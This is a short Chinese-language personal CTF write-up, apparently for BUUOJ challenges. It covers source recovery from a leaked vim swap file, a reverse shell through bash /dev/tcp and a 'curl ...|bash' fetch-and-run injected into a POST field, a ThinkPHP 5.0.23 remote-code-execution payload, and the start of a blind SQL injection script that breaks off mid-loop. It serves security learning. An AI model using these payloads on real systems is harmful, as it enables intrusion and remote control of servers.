记录一下,以后忘记了还能看看
fake google-飞机票
duangShell
- .index.php.swp源码泄露
一进去提示我们:how can i give you source code? .swp?!
,获取源码后,利用vim再把它改回去就行,直接打开会乱码:vim -r index.php.swp
恢复。
因为exec()无回显,而且没有禁curl。所以可以反弹shell~~
- 先查看ip地址
ifconfig
- 进入/var/www/html写一个txt文件。
bash -i >& /dev/tcp/ip/port 0>&1
ip就是本地ip,端口随便写一个- 监听端口1234
nc -lvp 1234
- 再post一个girlfriend的值
girl_friend=curl 174.1.145.235/b.txt|bash
- 直接cat /flag是不会出来的
grep -r "flag{" /etc
old-hack
题目题是thinkphp5,拿通用thinkphp5的payload打了下,然后发现版本5.0.23
然后拿5.0.23打了下,没看到flag,还以为我没打通,结果在最上面。。
/index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag
简单注入
hint.txt有语句提示:select * from users where username='$_POST["username"]' and password='$_POST["password"]';
对sql的注入还不太了解,放一下大师傅的二分注入
import requests
import time
url = "http://523c9df3-1d44-44e8-bcc5-2a8ad35c3ff4.node3.buuoj.cn/"
temp = {}
password = ""
for i in range(1,1000):
time.sleep(0.06)